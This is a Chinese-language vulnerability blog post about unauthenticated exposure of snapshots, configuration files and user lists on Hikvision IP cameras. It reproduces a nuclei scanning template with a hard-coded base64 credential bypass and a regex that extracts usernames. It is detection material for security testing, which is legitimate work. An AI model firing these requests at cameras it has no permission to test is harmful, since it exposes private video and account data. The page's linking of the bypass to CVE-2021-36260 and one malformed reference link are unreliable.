Hikvision IP Camera - Snapshot, Config, and User Info Exposure

漏洞信息

漏洞名称: Hikvision IP Camera - Snapshot, Config, and User Info Exposure

漏洞编号:

  • CVE: CVE-2021-36260

漏洞类型: 信息泄露

漏洞等级: 高危

漏洞描述: 该漏洞影响Hikvision IP摄像头,这是一种广泛用于企业和家庭监控的物联网设备。Hikvision是全球领先的视频监控产品供应商,其IP摄像头被部署在各种安全敏感的环境中,如政府机构、银行、学校和住宅区。漏洞允许未经认证的攻击者访问敏感端点,包括实时快照、加密的配置文件和完整的用户凭证XML。这主要是由于CVE-2021-36260及相关绕过逻辑的利用链造成的。漏洞的技术根源在于设备对认证请求的处理不当,使得攻击者可以绕过认证机制直接访问敏感信息。这种信息泄露漏洞可能导致严重的安全风险,包括但不限于隐私侵犯、安全配置泄露和进一步的系统入侵。攻击者可以利用泄露的信息进行身份冒充、系统配置篡改或其他恶意活动。由于漏洞允许未经认证的访问,且可以自动化利用,因此对受影响设备的威胁程度较高。

产品厂商: Hikvision

产品名称: Hikvision IP Camera

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c638200226d238edb5730d453bea2911782f68a6/vulnerabilities%2Fiot%2Fhikvision%2Fhikvision-cam-info-exposure.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

id: hikvision-cam-info-exposure

info:
  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
  author: AbdulrahmanTamim
  severity: high
  description: |
    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2021-36260
    - https://nvd.nist.nist.gov/vuln/detail/CVE-2021-36260
    - https://seclists.org/fulldisclosure/2017/Sep/23
  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml

variables:
  b64auth: YWRtaW46MTEK

requests:
  - method: GET
    path:
      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Unauthenticated Snapshot Exposure"
        type: word
        part: header
        words:
          - "Content-Type: image/jpeg"
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Downloadable Config File"
        type: word
        part: header
        words:
          - "Content-Type: application/octet-stream"
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/Security/users?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Exposed Usernames"
        type: word
        words:
          - "<userName>"
          - "<userLevel>"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: Usernames
        group: 1
        regex:
          - "<userName>(.*?)</userName>"


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
Hikvision IP Camera - Snapshot, Config, and User Info Exposure
http://example.com/2025/07/10/github_2898359546/
作者
lianccc
发布于
2025年7月10日
许可协议